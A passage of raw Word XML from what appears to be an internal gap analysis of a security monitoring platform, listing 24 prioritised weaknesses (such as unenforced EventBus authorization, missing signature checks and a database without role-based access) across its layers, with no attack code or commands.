              <w:t>Gap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0F35A3B0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Impact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17D549F7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="13A8C7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5ABC0C3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G1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90E9E88" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Integrity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0E488E5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>EventBus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> authorization NOT enforced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A648997" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Any client can publish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DFF3BE0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>EventBus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="2B6BC1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D0AE135" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G2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56E8FBD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Integrity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D8D0532" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Signature verification NOT called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60D5090" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Unsigned events accepted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7D898D3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>EventBus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="11ED08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FF6A592" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G14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43AB28D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Testing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AE07CE7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>19/26 correlation rules have ZERO tests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1246DCF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Silent rule failures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D95410A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="6CD08E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D619E84" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G15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50B1B0D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Logic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619872F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Short-circuit rule evaluation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C63D82A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Multi-stage attacks missed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D687EAD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="354460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7EE6AE5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G20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087A2D7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Security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E7EEF2A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Database manager has NO role-based access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6AA0F06" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Any user can wipe DB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50F412F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Cortex</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="2F0092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B257A23" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G21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7CB5906" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Security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F22F986" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No rate limiting on destructive DB ops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BCB41F4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence destruction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FADF0ED" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Cortex</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43F8BA5C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38122BF8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>9.2 P1 — High (Fix before GA)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3"/>
        <w:gridCol w:w="1367"/>
        <w:gridCol w:w="3941"/>
        <w:gridCol w:w="2559"/>
        <w:gridCol w:w="1078"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA1094" w14:paraId="62A298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2C2DAD0D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000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6F548B09" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category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1966C4C5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Gap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16976DA5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Impact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4A560FA2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="6801CE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2C67671" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G3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2BA7CA1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Integrity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74C1371" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No replay protection (idem key collision)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C929F8F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Cross-agent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dedup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> errors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FFFEBB2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>EventBus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="3DDC12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8647EDA" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G4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2633D66" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Reliability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437417B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No per-agent rate limiting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6D7D3D6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Bad agent starves bus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0E6B5DF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>EventBus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="656D55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ECD775D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G6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B691003" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Operations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8982C24" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No maximum WAL backlog age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0E22DE1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Stale events processed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006F18C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>WAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="7F96E9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E7276E9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G7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8489358" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Reliability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3499AD8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No circuit breaker on downstream failures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9C61E53" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Retry storms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085FF11" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>WAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="53C57F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B84A6B3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G8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AFC0728" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Observability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1AB531D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Chain break count NOT exported as metric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4A04140" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Tampering invisible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2F3F331" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>WAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="69B55E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AB7917B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G10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F54FDB0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Enrichment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A953942" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URLs not enriched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9C2572B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Malicious URLs undetected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F96DD51" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Enrichment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="4DF716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DF026DC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G16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10FB32B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Logic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2594C04" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No cross-device correlation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6C615A8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Coordinated attacks missed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839D6ED" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="373983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B28A12C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G17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0BBE430" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Config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32DB8B0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Hardcoded time windows (5/10/15/30 min)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C131B12" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No tuning possible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4024C65" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="4D9582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4812EE7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>G22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AF123F1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Integrity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FFCAE16" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Hash chain NOT exposed to Cortex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BAF8484" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No UI integrity proof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77BA5D4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Cortex</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="61E7A9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BC58CDC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G23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4B9CBF5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Accountability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6D24F65" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No user attribution on incident changes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D3CA3EC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Untraceable modifications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A693A1F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Cortex</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F6259D5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B1CEE89" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>9.3 P2 — Medium (Improve over time)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"/>
        <w:gridCol w:w="1149"/>
        <w:gridCol w:w="4079"/>
        <w:gridCol w:w="2541"/>
        <w:gridCol w:w="1149"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA1094" w14:paraId="19CE7D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2FF7D36A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000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51765496" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category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4397D87B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Gap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3358C64B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Impact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2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="6FBBFC64" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="17D407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1B7CDD5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G5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3602D83" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Security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BBEB8DB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Prometheus metrics endpoint unprotected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EC6813A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Info leakage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058557A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>EventBus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="0DB16F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C2266B6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G9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ECB3946" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Validation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560EE26" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Schema version stored but NOT validated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29CF8BB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Version drift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AFED801" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>WAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="565A33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B0CE3B1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G11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887EC7E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Enrichment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1888CE4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>User context not enriched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E91EEFB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No baseline anomaly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F89D918" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Enrichment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="4B1BCB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D6D0DAB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G12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BB236C8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Enrichment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EEC7272" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Binary reputation not checked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FEF4673" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Unknown malware passes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96E64BE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Enrichment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="6A646F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4551EFB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G13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0922A25" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Freshness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267B8AB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>MaxMind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> DB monthly staleness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02428D3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>New IPs unresolved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63F0309" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Enrichment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="635728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A050616" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G18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DC754F5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Logic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313021D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No delayed event recovery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B44D47A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Slow attacks missed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A97F9CD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="6CCB91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1AB0514" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G19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8EEA59C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Coverage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654273E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Missing MITRE Impact tactic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57239A2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Destruction undetected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A19D9F7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="5F00B4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89D959D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>G24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0818B9E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Privacy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4D5EF3B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>WebSocket broadcasts all data to all users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E47AB89" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Over-exposure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E8C7F69" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Cortex</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3916151C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F349B68" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>9.4 Gap Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403A9C27" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>P0 (Critical): 6 gaps — must fix before any public release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238566ED" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>P1 (High): 10 gaps — fix before GA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCA5502" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>P2 (Medium): 8 gaps — roadmap items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202C0F6F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>Total: 24 identified gaps across all layers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5558E9C4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00FA109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43E66"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="322E673A"/>
    <w:lvl w:ilvl="0" w:tplc="874257A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0E645432">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="928C865E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2F2876E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0434A5F4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="ECEA7E28">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="68C263C2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="6E80A818">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="138EAF68">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="9064951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094"/>
    <w:rsid w:val="002B7FEE"/>
    <w:rsid w:val="009A145D"/>
    <w:rsid w:val="00F308F7"/>
    <w:rsid w:val="00FA1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2CE36C"/>
  <w15:docId w15:val="{C0FE2066-E32E-D042-B54F-A3FB6C8C9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2817</Words>
  <Characters>16063</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>133</Lines>
  <Paragraphs>37</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>18843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Akash Thanneeru</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-24T09:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-24T11:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>